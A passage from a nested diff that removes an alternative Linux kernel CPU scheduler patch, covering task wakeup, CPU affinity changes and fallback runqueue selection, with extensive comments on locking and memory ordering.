-+		 * Ok, time to look more closely! We need the rq
-+		 * lock now, to be *sure*. If we're wrong, we'll
-+		 * just go back and repeat.
-+		 */
-+		task_access_lock_irqsave(p, &lock, &flags);
-+		trace_sched_wait_task(p);
-+		running = task_on_cpu(p);
-+		on_rq = p->on_rq;
-+		ncsw = 0;
-+		if (READ_ONCE(p->__state) & match_state)
-+			ncsw = p->nvcsw | LONG_MIN; /* sets MSB */
-+		task_access_unlock_irqrestore(p, lock, &flags);
-+
-+		/*
-+		 * If it changed from the expected state, bail out now.
-+		 */
-+		if (unlikely(!ncsw))
-+			break;
-+
-+		/*
-+		 * Was it really running after all now that we
-+		 * checked with the proper locks actually held?
-+		 *
-+		 * Oops. Go back and try again..
-+		 */
-+		if (unlikely(running)) {
-+			cpu_relax();
-+			continue;
-+		}
-+
-+		/*
-+		 * It's not enough that it's not actively running,
-+		 * it must be off the runqueue _entirely_, and not
-+		 * preempted!
-+		 *
-+		 * So if it was still runnable (but just not actively
-+		 * running right now), it's preempted, and we should
-+		 * yield - it could be a while.
-+		 */
-+		if (unlikely(on_rq)) {
-+			ktime_t to = NSEC_PER_SEC / HZ;
-+
-+			set_current_state(TASK_UNINTERRUPTIBLE);
-+			schedule_hrtimeout(&to, HRTIMER_MODE_REL_HARD);
-+			continue;
-+		}
-+
-+		/*
-+		 * Ahh, all good. It wasn't running, and it wasn't
-+		 * runnable, which means that it will never become
-+		 * running in the future either. We're all done!
-+		 */
-+		break;
-+	}
-+
-+	return ncsw;
-+}
-+
-+/***
-+ * kick_process - kick a running thread to enter/exit the kernel
-+ * @p: the to-be-kicked thread
-+ *
-+ * Cause a process which is running on another CPU to enter
-+ * kernel-mode, without any delay. (to get signals handled.)
-+ *
-+ * NOTE: this function doesn't have to take the runqueue lock,
-+ * because all it wants to ensure is that the remote task enters
-+ * the kernel. If the IPI races and the task has been migrated
-+ * to another CPU then no harm is done and the purpose has been
-+ * achieved as well.
-+ */
-+void kick_process(struct task_struct *p)
-+{
-+	int cpu;
-+
-+	preempt_disable();
-+	cpu = task_cpu(p);
-+	if ((cpu != smp_processor_id()) && task_curr(p))
-+		smp_send_reschedule(cpu);
-+	preempt_enable();
-+}
-+EXPORT_SYMBOL_GPL(kick_process);
-+
-+/*
-+ * ->cpus_ptr is protected by both rq->lock and p->pi_lock
-+ *
-+ * A few notes on cpu_active vs cpu_online:
-+ *
-+ *  - cpu_active must be a subset of cpu_online
-+ *
-+ *  - on CPU-up we allow per-CPU kthreads on the online && !active CPU,
-+ *    see __set_cpus_allowed_ptr(). At this point the newly online
-+ *    CPU isn't yet part of the sched domains, and balancing will not
-+ *    see it.
-+ *
-+ *  - on cpu-down we clear cpu_active() to mask the sched domains and
-+ *    avoid the load balancer to place new tasks on the to be removed
-+ *    CPU. Existing tasks will remain running there and will be taken
-+ *    off.
-+ *
-+ * This means that fallback selection must not select !active CPUs.
-+ * And can assume that any active CPU must be online. Conversely
-+ * select_task_rq() below may allow selection of !active CPUs in order
-+ * to satisfy the above rules.
-+ */
-+static int select_fallback_rq(int cpu, struct task_struct *p)
-+{
-+	int nid = cpu_to_node(cpu);
-+	const struct cpumask *nodemask = NULL;
-+	enum { cpuset, possible, fail } state = cpuset;
-+	int dest_cpu;
-+
-+	/*
-+	 * If the node that the CPU is on has been offlined, cpu_to_node()
-+	 * will return -1. There is no CPU on the node, and we should
-+	 * select the CPU on the other node.
-+	 */
-+	if (nid != -1) {
-+		nodemask = cpumask_of_node(nid);
-+
-+		/* Look for allowed, online CPU in same node. */
-+		for_each_cpu(dest_cpu, nodemask) {
-+			if (is_cpu_allowed(p, dest_cpu))
-+				return dest_cpu;
-+		}
-+	}
-+
-+	for (;;) {
-+		/* Any allowed, online CPU? */
-+		for_each_cpu(dest_cpu, p->cpus_ptr) {
-+			if (!is_cpu_allowed(p, dest_cpu))
-+				continue;
-+			goto out;
-+		}
-+
-+		/* No more Mr. Nice Guy. */
-+		switch (state) {
-+		case cpuset:
-+			if (cpuset_cpus_allowed_fallback(p)) {
-+				state = possible;
-+				break;
-+			}
-+			fallthrough;
-+		case possible:
-+			/*
-+			 * XXX When called from select_task_rq() we only
-+			 * hold p->pi_lock and again violate locking order.
-+			 *
-+			 * More yuck to audit.
-+			 */
-+			do_set_cpus_allowed(p, task_cpu_possible_mask(p));
-+			state = fail;
-+			break;
-+
-+		case fail:
-+			BUG();
-+			break;
-+		}
-+	}
-+
-+out:
-+	if (state != cpuset) {
-+		/*
-+		 * Don't tell them about moving exiting tasks or
-+		 * kernel threads (both mm NULL), since they never
-+		 * leave kernel.
-+		 */
-+		if (p->mm && printk_ratelimit()) {
-+			printk_deferred("process %d (%s) no longer affine to cpu%d\n",
-+					task_pid_nr(p), p->comm, cpu);
-+		}
-+	}
-+
-+	return dest_cpu;
-+}
-+
-+static inline void
-+sched_preempt_mask_flush(cpumask_t *mask, int prio)
-+{
-+	int cpu;
-+
-+	cpumask_copy(mask, sched_idle_mask);
-+
-+	for_each_cpu_not(cpu, mask) {
-+		if (prio < cpu_rq(cpu)->prio)
-+			cpumask_set_cpu(cpu, mask);
-+	}
-+}
-+
-+static inline int
-+preempt_mask_check(struct task_struct *p, cpumask_t *allow_mask, cpumask_t *preempt_mask)
-+{
-+	int task_prio = task_sched_prio(p);
-+	cpumask_t *mask = sched_preempt_mask + SCHED_QUEUE_BITS - 1 - task_prio;
-+	int pr = atomic_read(&sched_prio_record);
-+
-+	if (pr != task_prio) {
-+		sched_preempt_mask_flush(mask, task_prio);
-+		atomic_set(&sched_prio_record, task_prio);
-+	}
-+
-+	return cpumask_and(preempt_mask, allow_mask, mask);
-+}
-+
-+static inline int select_task_rq(struct task_struct *p)
-+{
-+	cpumask_t allow_mask, mask;
-+
-+	if (unlikely(!cpumask_and(&allow_mask, p->cpus_ptr, cpu_active_mask)))
-+		return select_fallback_rq(task_cpu(p), p);
-+
-+	if (
-+#ifdef CONFIG_SCHED_SMT
-+	    cpumask_and(&mask, &allow_mask, &sched_sg_idle_mask) ||
-+#endif
-+	    cpumask_and(&mask, &allow_mask, sched_idle_mask) ||
-+	    preempt_mask_check(p, &allow_mask, &mask))
-+		return best_mask_cpu(task_cpu(p), &mask);
-+
-+	return best_mask_cpu(task_cpu(p), &allow_mask);
-+}
-+
-+void sched_set_stop_task(int cpu, struct task_struct *stop)
-+{
-+	static struct lock_class_key stop_pi_lock;
-+	struct sched_param stop_param = { .sched_priority = STOP_PRIO };
-+	struct sched_param start_param = { .sched_priority = 0 };
-+	struct task_struct *old_stop = cpu_rq(cpu)->stop;
-+
-+	if (stop) {
-+		/*
-+		 * Make it appear like a SCHED_FIFO task, its something
-+		 * userspace knows about and won't get confused about.
-+		 *
-+		 * Also, it will make PI more or less work without too
-+		 * much confusion -- but then, stop work should not
-+		 * rely on PI working anyway.
-+		 */
-+		sched_setscheduler_nocheck(stop, SCHED_FIFO, &stop_param);
-+
-+		/*
-+		 * The PI code calls rt_mutex_setprio() with ->pi_lock held to
-+		 * adjust the effective priority of a task. As a result,
-+		 * rt_mutex_setprio() can trigger (RT) balancing operations,
-+		 * which can then trigger wakeups of the stop thread to push
-+		 * around the current task.
-+		 *
-+		 * The stop task itself will never be part of the PI-chain, it
-+		 * never blocks, therefore that ->pi_lock recursion is safe.
-+		 * Tell lockdep about this by placing the stop->pi_lock in its
-+		 * own class.
-+		 */
-+		lockdep_set_class(&stop->pi_lock, &stop_pi_lock);
-+	}
-+
-+	cpu_rq(cpu)->stop = stop;
-+
-+	if (old_stop) {
-+		/*
-+		 * Reset it back to a normal scheduling policy so that
-+		 * it can die in pieces.
-+		 */
-+		sched_setscheduler_nocheck(old_stop, SCHED_NORMAL, &start_param);
-+	}
-+}
-+
-+static int affine_move_task(struct rq *rq, struct task_struct *p, int dest_cpu,
-+			    raw_spinlock_t *lock, unsigned long irq_flags)
-+{
-+	/* Can the task run on the task's current CPU? If so, we're done */
-+	if (!cpumask_test_cpu(task_cpu(p), &p->cpus_mask)) {
-+		if (p->migration_disabled) {
-+			if (likely(p->cpus_ptr != &p->cpus_mask))
-+				__do_set_cpus_ptr(p, &p->cpus_mask);
-+			p->migration_disabled = 0;
-+			p->migration_flags |= MDF_FORCE_ENABLED;
-+			/* When p is migrate_disabled, rq->lock should be held */
-+			rq->nr_pinned--;
-+		}
-+
-+		if (task_on_cpu(p) || READ_ONCE(p->__state) == TASK_WAKING) {
-+			struct migration_arg arg = { p, dest_cpu };
-+
-+			/* Need help from migration thread: drop lock and wait. */
-+			__task_access_unlock(p, lock);
-+			raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
-+			stop_one_cpu(cpu_of(rq), migration_cpu_stop, &arg);
-+			return 0;
-+		}
-+		if (task_on_rq_queued(p)) {
-+			/*
-+			 * OK, since we're going to drop the lock immediately
-+			 * afterwards anyway.
-+			 */
-+			update_rq_clock(rq);
-+			rq = move_queued_task(rq, p, dest_cpu);
-+			lock = &rq->lock;
-+		}
-+	}
-+	__task_access_unlock(p, lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
-+	return 0;
-+}
-+
-+static int __set_cpus_allowed_ptr_locked(struct task_struct *p,
-+					 const struct cpumask *new_mask,
-+					 u32 flags,
-+					 struct rq *rq,
-+					 raw_spinlock_t *lock,
-+					 unsigned long irq_flags)
-+{
-+	const struct cpumask *cpu_allowed_mask = task_cpu_possible_mask(p);
-+	const struct cpumask *cpu_valid_mask = cpu_active_mask;
-+	bool kthread = p->flags & PF_KTHREAD;
-+	struct cpumask *user_mask = NULL;
-+	int dest_cpu;
-+	int ret = 0;
-+
-+	if (kthread || is_migration_disabled(p)) {
-+		/*
-+		 * Kernel threads are allowed on online && !active CPUs,
-+		 * however, during cpu-hot-unplug, even these might get pushed
-+		 * away if not KTHREAD_IS_PER_CPU.
-+		 *
-+		 * Specifically, migration_disabled() tasks must not fail the
-+		 * cpumask_any_and_distribute() pick below, esp. so on
-+		 * SCA_MIGRATE_ENABLE, otherwise we'll not call
-+		 * set_cpus_allowed_common() and actually reset p->cpus_ptr.
-+		 */
-+		cpu_valid_mask = cpu_online_mask;
-+	}
-+
-+	if (!kthread && !cpumask_subset(new_mask, cpu_allowed_mask)) {
-+		ret = -EINVAL;
-+		goto out;
-+	}
-+
-+	/*
-+	 * Must re-check here, to close a race against __kthread_bind(),
-+	 * sched_setaffinity() is not guaranteed to observe the flag.
-+	 */
-+	if ((flags & SCA_CHECK) && (p->flags & PF_NO_SETAFFINITY)) {
-+		ret = -EINVAL;
-+		goto out;
-+	}
-+
-+	if (cpumask_equal(&p->cpus_mask, new_mask))
-+		goto out;
-+
-+	dest_cpu = cpumask_any_and(cpu_valid_mask, new_mask);
-+	if (dest_cpu >= nr_cpu_ids) {
-+		ret = -EINVAL;
-+		goto out;
-+	}
-+
-+	__do_set_cpus_allowed(p, new_mask);
-+
-+	if (flags & SCA_USER)
-+		user_mask = clear_user_cpus_ptr(p);
-+
-+	ret = affine_move_task(rq, p, dest_cpu, lock, irq_flags);
-+
-+	kfree(user_mask);
-+
-+	return ret;
-+
-+out:
-+	__task_access_unlock(p, lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
-+
-+	return ret;
-+}
-+
-+/*
-+ * Change a given task's CPU affinity. Migrate the thread to a
-+ * proper CPU and schedule it away if the CPU it's executing on
-+ * is removed from the allowed bitmask.
-+ *
-+ * NOTE: the caller must have a valid reference to the task, the
-+ * task must not exit() & deallocate itself prematurely. The
-+ * call is not atomic; no spinlocks may be held.
-+ */
-+static int __set_cpus_allowed_ptr(struct task_struct *p,
-+				  const struct cpumask *new_mask, u32 flags)
-+{
-+	unsigned long irq_flags;
-+	struct rq *rq;
-+	raw_spinlock_t *lock;
-+
-+	raw_spin_lock_irqsave(&p->pi_lock, irq_flags);
-+	rq = __task_access_lock(p, &lock);
-+
-+	return __set_cpus_allowed_ptr_locked(p, new_mask, flags, rq, lock, irq_flags);
-+}
-+
-+int set_cpus_allowed_ptr(struct task_struct *p, const struct cpumask *new_mask)
-+{
-+	return __set_cpus_allowed_ptr(p, new_mask, 0);
-+}
-+EXPORT_SYMBOL_GPL(set_cpus_allowed_ptr);
-+
-+/*
-+ * Change a given task's CPU affinity to the intersection of its current
-+ * affinity mask and @subset_mask, writing the resulting mask to @new_mask
-+ * and pointing @p->user_cpus_ptr to a copy of the old mask.
-+ * If the resulting mask is empty, leave the affinity unchanged and return
-+ * -EINVAL.
-+ */
-+static int restrict_cpus_allowed_ptr(struct task_struct *p,
-+				     struct cpumask *new_mask,
-+				     const struct cpumask *subset_mask)
-+{
-+	struct cpumask *user_mask = NULL;
-+	unsigned long irq_flags;
-+	raw_spinlock_t *lock;
-+	struct rq *rq;
-+	int err;
-+
-+	if (!p->user_cpus_ptr) {
-+		user_mask = kmalloc(cpumask_size(), GFP_KERNEL);
-+		if (!user_mask)
-+			return -ENOMEM;
-+	}
-+
-+	raw_spin_lock_irqsave(&p->pi_lock, irq_flags);
-+	rq = __task_access_lock(p, &lock);
-+
-+	if (!cpumask_and(new_mask, &p->cpus_mask, subset_mask)) {
-+		err = -EINVAL;
-+		goto err_unlock;
-+	}
-+
-+	/*
-+	 * We're about to butcher the task affinity, so keep track of what
-+	 * the user asked for in case we're able to restore it later on.
-+	 */
-+	if (user_mask) {
-+		cpumask_copy(user_mask, p->cpus_ptr);
-+		p->user_cpus_ptr = user_mask;
-+	}
-+
-+	/*return __set_cpus_allowed_ptr_locked(p, new_mask, 0, rq, &rf);*/
-+	return __set_cpus_allowed_ptr_locked(p, new_mask, 0, rq, lock, irq_flags);
-+
-+err_unlock:
-+	__task_access_unlock(p, lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
-+	kfree(user_mask);
-+	return err;
-+}
-+
-+/*
-+ * Restrict the CPU affinity of task @p so that it is a subset of
-+ * task_cpu_possible_mask() and point @p->user_cpu_ptr to a copy of the
-+ * old affinity mask. If the resulting mask is empty, we warn and walk
-+ * up the cpuset hierarchy until we find a suitable mask.
-+ */
-+void force_compatible_cpus_allowed_ptr(struct task_struct *p)
-+{
-+	cpumask_var_t new_mask;
-+	const struct cpumask *override_mask = task_cpu_possible_mask(p);
-+
-+	alloc_cpumask_var(&new_mask, GFP_KERNEL);
-+
-+	/*
-+	 * __migrate_task() can fail silently in the face of concurrent
-+	 * offlining of the chosen destination CPU, so take the hotplug
-+	 * lock to ensure that the migration succeeds.
-+	 */
-+	cpus_read_lock();
-+	if (!cpumask_available(new_mask))
-+		goto out_set_mask;
-+
-+	if (!restrict_cpus_allowed_ptr(p, new_mask, override_mask))
-+		goto out_free_mask;
-+
-+	/*
-+	 * We failed to find a valid subset of the affinity mask for the
-+	 * task, so override it based on its cpuset hierarchy.
-+	 */
-+	cpuset_cpus_allowed(p, new_mask);
-+	override_mask = new_mask;
-+
-+out_set_mask:
-+	if (printk_ratelimit()) {
-+		printk_deferred("Overriding affinity for process %d (%s) to CPUs %*pbl\n",
-+				task_pid_nr(p), p->comm,
-+				cpumask_pr_args(override_mask));
-+	}
-+
-+	WARN_ON(set_cpus_allowed_ptr(p, override_mask));
-+out_free_mask:
-+	cpus_read_unlock();
-+	free_cpumask_var(new_mask);
-+}
-+
-+static int
-+__sched_setaffinity(struct task_struct *p, const struct cpumask *mask);
-+
-+/*
-+ * Restore the affinity of a task @p which was previously restricted by a
-+ * call to force_compatible_cpus_allowed_ptr(). This will clear (and free)
-+ * @p->user_cpus_ptr.
-+ *
-+ * It is the caller's responsibility to serialise this with any calls to
-+ * force_compatible_cpus_allowed_ptr(@p).
-+ */
-+void relax_compatible_cpus_allowed_ptr(struct task_struct *p)
-+{
-+	struct cpumask *user_mask = p->user_cpus_ptr;
-+	unsigned long flags;
-+
-+	/*
-+	 * Try to restore the old affinity mask. If this fails, then
-+	 * we free the mask explicitly to avoid it being inherited across
-+	 * a subsequent fork().
-+	 */
-+	if (!user_mask || !__sched_setaffinity(p, user_mask))
-+		return;
-+
-+	raw_spin_lock_irqsave(&p->pi_lock, flags);
-+	user_mask = clear_user_cpus_ptr(p);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+
-+	kfree(user_mask);
-+}
-+
-+#else /* CONFIG_SMP */
-+
-+static inline int select_task_rq(struct task_struct *p)
-+{
-+	return 0;
-+}
-+
-+static inline int
-+__set_cpus_allowed_ptr(struct task_struct *p,
-+		       const struct cpumask *new_mask, u32 flags)
-+{
-+	return set_cpus_allowed_ptr(p, new_mask);
-+}
-+
-+static inline bool rq_has_pinned_tasks(struct rq *rq)
-+{
-+	return false;
-+}
-+
-+#endif /* !CONFIG_SMP */
-+
-+static void
-+ttwu_stat(struct task_struct *p, int cpu, int wake_flags)
-+{
-+	struct rq *rq;
-+
-+	if (!schedstat_enabled())
-+		return;
-+
-+	rq = this_rq();
-+
-+#ifdef CONFIG_SMP
-+	if (cpu == rq->cpu) {
-+		__schedstat_inc(rq->ttwu_local);
-+		__schedstat_inc(p->stats.nr_wakeups_local);
-+	} else {
-+		/** Alt schedule FW ToDo:
-+		 * How to do ttwu_wake_remote
-+		 */
-+	}
-+#endif /* CONFIG_SMP */
-+
-+	__schedstat_inc(rq->ttwu_count);
-+	__schedstat_inc(p->stats.nr_wakeups);
-+}
-+
-+/*
-+ * Mark the task runnable and perform wakeup-preemption.
-+ */
-+static inline void
-+ttwu_do_wakeup(struct rq *rq, struct task_struct *p, int wake_flags)
-+{
-+	check_preempt_curr(rq);
-+	WRITE_ONCE(p->__state, TASK_RUNNING);
-+	trace_sched_wakeup(p);
-+}
-+
-+static inline void
-+ttwu_do_activate(struct rq *rq, struct task_struct *p, int wake_flags)
-+{
-+	if (p->sched_contributes_to_load)
-+		rq->nr_uninterruptible--;
-+
-+	if (
-+#ifdef CONFIG_SMP
-+	    !(wake_flags & WF_MIGRATED) &&
-+#endif
-+	    p->in_iowait) {
-+		delayacct_blkio_end(p);
-+		atomic_dec(&task_rq(p)->nr_iowait);
-+	}
-+
-+	activate_task(p, rq);
-+	ttwu_do_wakeup(rq, p, 0);
-+}
-+
-+/*
-+ * Consider @p being inside a wait loop:
-+ *
-+ *   for (;;) {
-+ *      set_current_state(TASK_UNINTERRUPTIBLE);
-+ *
-+ *      if (CONDITION)
-+ *         break;
-+ *
-+ *      schedule();
-+ *   }
-+ *   __set_current_state(TASK_RUNNING);
-+ *
-+ * between set_current_state() and schedule(). In this case @p is still
-+ * runnable, so all that needs doing is change p->state back to TASK_RUNNING in
-+ * an atomic manner.
-+ *
-+ * By taking task_rq(p)->lock we serialize against schedule(), if @p->on_rq
-+ * then schedule() must still happen and p->state can be changed to
-+ * TASK_RUNNING. Otherwise we lost the race, schedule() has happened, and we
-+ * need to do a full wakeup with enqueue.
-+ *
-+ * Returns: %true when the wakeup is done,
-+ *          %false otherwise.
-+ */
-+static int ttwu_runnable(struct task_struct *p, int wake_flags)
-+{
-+	struct rq *rq;
-+	raw_spinlock_t *lock;
-+	int ret = 0;
-+
-+	rq = __task_access_lock(p, &lock);
-+	if (task_on_rq_queued(p)) {
-+		/* check_preempt_curr() may use rq clock */
-+		update_rq_clock(rq);
-+		ttwu_do_wakeup(rq, p, wake_flags);
-+		ret = 1;
-+	}
-+	__task_access_unlock(p, lock);
-+
-+	return ret;
-+}
-+
-+#ifdef CONFIG_SMP
-+void sched_ttwu_pending(void *arg)
-+{
-+	struct llist_node *llist = arg;
-+	struct rq *rq = this_rq();
-+	struct task_struct *p, *t;
-+	struct rq_flags rf;
-+
-+	if (!llist)
-+		return;
-+
-+	/*
-+	 * rq::ttwu_pending racy indication of out-standing wakeups.
-+	 * Races such that false-negatives are possible, since they
-+	 * are shorter lived that false-positives would be.
-+	 */
-+	WRITE_ONCE(rq->ttwu_pending, 0);
-+
-+	rq_lock_irqsave(rq, &rf);
-+	update_rq_clock(rq);
-+
-+	llist_for_each_entry_safe(p, t, llist, wake_entry.llist) {
-+		if (WARN_ON_ONCE(p->on_cpu))
-+			smp_cond_load_acquire(&p->on_cpu, !VAL);
-+
-+		if (WARN_ON_ONCE(task_cpu(p) != cpu_of(rq)))
-+			set_task_cpu(p, cpu_of(rq));
-+
-+		ttwu_do_activate(rq, p, p->sched_remote_wakeup ? WF_MIGRATED : 0);
-+	}
-+
-+	rq_unlock_irqrestore(rq, &rf);
-+}
-+
-+void send_call_function_single_ipi(int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+
-+	if (!set_nr_if_polling(rq->idle))
-+		arch_send_call_function_single_ipi(cpu);
-+	else
-+		trace_sched_wake_idle_without_ipi(cpu);
-+}
-+
-+/*
-+ * Queue a task on the target CPUs wake_list and wake the CPU via IPI if
-+ * necessary. The wakee CPU on receipt of the IPI will queue the task
-+ * via sched_ttwu_wakeup() for activation so the wakee incurs the cost
-+ * of the wakeup instead of the waker.
-+ */
-+static void __ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+
-+	p->sched_remote_wakeup = !!(wake_flags & WF_MIGRATED);
-+
-+	WRITE_ONCE(rq->ttwu_pending, 1);
-+	__smp_call_single_queue(cpu, &p->wake_entry.llist);
-+}
-+
-+static inline bool ttwu_queue_cond(struct task_struct *p, int cpu)
-+{
-+	/*
-+	 * Do not complicate things with the async wake_list while the CPU is
-+	 * in hotplug state.
-+	 */
-+	if (!cpu_active(cpu))
-+		return false;
-+
-+	/* Ensure the task will still be allowed to run on the CPU. */
-+	if (!cpumask_test_cpu(cpu, p->cpus_ptr))
-+		return false;
-+
-+	/*
-+	 * If the CPU does not share cache, then queue the task on the
-+	 * remote rqs wakelist to avoid accessing remote data.
-+	 */
-+	if (!cpus_share_cache(smp_processor_id(), cpu))
-+		return true;
-+
-+	if (cpu == smp_processor_id())
-+		return false;
-+
-+	/*
-+	 * If the wakee cpu is idle, or the task is descheduling and the
-+	 * only running task on the CPU, then use the wakelist to offload
-+	 * the task activation to the idle (or soon-to-be-idle) CPU as
-+	 * the current CPU is likely busy. nr_running is checked to
-+	 * avoid unnecessary task stacking.
-+	 *
-+	 * Note that we can only get here with (wakee) p->on_rq=0,
-+	 * p->on_cpu can be whatever, we've done the dequeue, so
-+	 * the wakee has been accounted out of ->nr_running.
-+	 */
-+	if (!cpu_rq(cpu)->nr_running)
-+		return true;
-+
-+	return false;
-+}
-+
-+static bool ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
-+{
-+	if (__is_defined(ALT_SCHED_TTWU_QUEUE) && ttwu_queue_cond(p, cpu)) {
-+		sched_clock_cpu(cpu); /* Sync clocks across CPUs */
-+		__ttwu_queue_wakelist(p, cpu, wake_flags);
-+		return true;
-+	}
-+
-+	return false;
-+}
-+
-+void wake_up_if_idle(int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	unsigned long flags;
-+
-+	rcu_read_lock();
-+
-+	if (!is_idle_task(rcu_dereference(rq->curr)))
-+		goto out;
-+
-+	raw_spin_lock_irqsave(&rq->lock, flags);
-+	if (is_idle_task(rq->curr))
-+		resched_curr(rq);
-+	/* Else CPU is not idle, do nothing here */
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+
-+out:
-+	rcu_read_unlock();
-+}
-+
-+bool cpus_share_cache(int this_cpu, int that_cpu)
-+{
-+	if (this_cpu == that_cpu)
-+		return true;
-+
-+	return per_cpu(sd_llc_id, this_cpu) == per_cpu(sd_llc_id, that_cpu);
-+}
-+#else /* !CONFIG_SMP */
-+
-+static inline bool ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
-+{
-+	return false;
-+}
-+
-+#endif /* CONFIG_SMP */
-+
-+static inline void ttwu_queue(struct task_struct *p, int cpu, int wake_flags)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+
-+	if (ttwu_queue_wakelist(p, cpu, wake_flags))
-+		return;
-+
-+	raw_spin_lock(&rq->lock);
-+	update_rq_clock(rq);
-+	ttwu_do_activate(rq, p, wake_flags);
-+	raw_spin_unlock(&rq->lock);
-+}
-+
-+/*
-+ * Invoked from try_to_wake_up() to check whether the task can be woken up.
-+ *
-+ * The caller holds p::pi_lock if p != current or has preemption
-+ * disabled when p == current.
-+ *
-+ * The rules of PREEMPT_RT saved_state:
-+ *
-+ *   The related locking code always holds p::pi_lock when updating
-+ *   p::saved_state, which means the code is fully serialized in both cases.
-+ *
-+ *   The lock wait and lock wakeups happen via TASK_RTLOCK_WAIT. No other
-+ *   bits set. This allows to distinguish all wakeup scenarios.
-+ */
-+static __always_inline
-+bool ttwu_state_match(struct task_struct *p, unsigned int state, int *success)
-+{
-+	if (IS_ENABLED(CONFIG_DEBUG_PREEMPT)) {
-+		WARN_ON_ONCE((state & TASK_RTLOCK_WAIT) &&
-+			     state != TASK_RTLOCK_WAIT);
-+	}
-+
-+	if (READ_ONCE(p->__state) & state) {
-+		*success = 1;
-+		return true;
-+	}
-+
-+#ifdef CONFIG_PREEMPT_RT
-+	/*
-+	 * Saved state preserves the task state across blocking on
-+	 * an RT lock.  If the state matches, set p::saved_state to
-+	 * TASK_RUNNING, but do not wake the task because it waits
-+	 * for a lock wakeup. Also indicate success because from
-+	 * the regular waker's point of view this has succeeded.
-+	 *
-+	 * After acquiring the lock the task will restore p::__state
-+	 * from p::saved_state which ensures that the regular
-+	 * wakeup is not lost. The restore will also set
-+	 * p::saved_state to TASK_RUNNING so any further tests will
-+	 * not result in false positives vs. @success
-+	 */
-+	if (p->saved_state & state) {
-+		p->saved_state = TASK_RUNNING;
-+		*success = 1;
-+	}
-+#endif
-+	return false;
-+}
-+
-+/*
-+ * Notes on Program-Order guarantees on SMP systems.
-+ *
-+ *  MIGRATION
-+ *
-+ * The basic program-order guarantee on SMP systems is that when a task [t]
-+ * migrates, all its activity on its old CPU [c0] happens-before any subsequent
-+ * execution on its new CPU [c1].
-+ *
-+ * For migration (of runnable tasks) this is provided by the following means:
-+ *
-+ *  A) UNLOCK of the rq(c0)->lock scheduling out task t
-+ *  B) migration for t is required to synchronize *both* rq(c0)->lock and
-+ *     rq(c1)->lock (if not at the same time, then in that order).
-+ *  C) LOCK of the rq(c1)->lock scheduling in task
-+ *
-+ * Transitivity guarantees that B happens after A and C after B.
-+ * Note: we only require RCpc transitivity.
-+ * Note: the CPU doing B need not be c0 or c1
-+ *
-+ * Example:
-+ *
-+ *   CPU0            CPU1            CPU2
-+ *
-+ *   LOCK rq(0)->lock
-+ *   sched-out X
-+ *   sched-in Y
-+ *   UNLOCK rq(0)->lock
-+ *
-+ *                                   LOCK rq(0)->lock // orders against CPU0
-+ *                                   dequeue X
-+ *                                   UNLOCK rq(0)->lock
-+ *
-+ *                                   LOCK rq(1)->lock
-+ *                                   enqueue X
-+ *                                   UNLOCK rq(1)->lock
-+ *
-+ *                   LOCK rq(1)->lock // orders against CPU2
-+ *                   sched-out Z
-+ *                   sched-in X
-+ *                   UNLOCK rq(1)->lock
-+ *
-+ *
-+ *  BLOCKING -- aka. SLEEP + WAKEUP
-+ *
-+ * For blocking we (obviously) need to provide the same guarantee as for
-+ * migration. However the means are completely different as there is no lock
-+ * chain to provide order. Instead we do:
-+ *
-+ *   1) smp_store_release(X->on_cpu, 0)   -- finish_task()
-+ *   2) smp_cond_load_acquire(!X->on_cpu) -- try_to_wake_up()
-+ *
-+ * Example:
-+ *
-+ *   CPU0 (schedule)  CPU1 (try_to_wake_up) CPU2 (schedule)
-+ *
-+ *   LOCK rq(0)->lock LOCK X->pi_lock
-+ *   dequeue X
-+ *   sched-out X
-+ *   smp_store_release(X->on_cpu, 0);
-+ *
-+ *                    smp_cond_load_acquire(&X->on_cpu, !VAL);
-+ *                    X->state = WAKING
-+ *                    set_task_cpu(X,2)
-+ *
-+ *                    LOCK rq(2)->lock
-+ *                    enqueue X
-+ *                    X->state = RUNNING
-+ *                    UNLOCK rq(2)->lock
-+ *
-+ *                                          LOCK rq(2)->lock // orders against CPU1
-+ *                                          sched-out Z
-+ *                                          sched-in X
-+ *                                          UNLOCK rq(2)->lock
-+ *
-+ *                    UNLOCK X->pi_lock
-+ *   UNLOCK rq(0)->lock
-+ *
-+ *
-+ * However; for wakeups there is a second guarantee we must provide, namely we
-+ * must observe the state that lead to our wakeup. That is, not only must our
-+ * task observe its own prior state, it must also observe the stores prior to
-+ * its wakeup.
-+ *
-+ * This means that any means of doing remote wakeups must order the CPU doing
-+ * the wakeup against the CPU the task is going to end up running on. This,
-+ * however, is already required for the regular Program-Order guarantee above,
-+ * since the waking CPU is the one issueing the ACQUIRE (smp_cond_load_acquire).
-+ *
-+ */
-+
-+/**
-+ * try_to_wake_up - wake up a thread
-+ * @p: the thread to be awakened
-+ * @state: the mask of task states that can be woken
-+ * @wake_flags: wake modifier flags (WF_*)
-+ *
-+ * Conceptually does:
-+ *
-+ *   If (@state & @p->state) @p->state = TASK_RUNNING.
-+ *
-+ * If the task was not queued/runnable, also place it back on a runqueue.
-+ *
-+ * This function is atomic against schedule() which would dequeue the task.
-+ *
-+ * It issues a full memory barrier before accessing @p->state, see the comment
-+ * with set_current_state().
-+ *
-+ * Uses p->pi_lock to serialize against concurrent wake-ups.
-+ *
-+ * Relies on p->pi_lock stabilizing:
-+ *  - p->sched_class
-+ *  - p->cpus_ptr
-+ *  - p->sched_task_group
-+ * in order to do migration, see its use of select_task_rq()/set_task_cpu().
-+ *
-+ * Tries really hard to only take one task_rq(p)->lock for performance.
-+ * Takes rq->lock in:
-+ *  - ttwu_runnable()    -- old rq, unavoidable, see comment there;
-+ *  - ttwu_queue()       -- new rq, for enqueue of the task;
-+ *  - psi_ttwu_dequeue() -- much sadness :-( accounting will kill us.
-+ *
-+ * As a consequence we race really badly with just about everything. See the
-+ * many memory barriers and their comments for details.
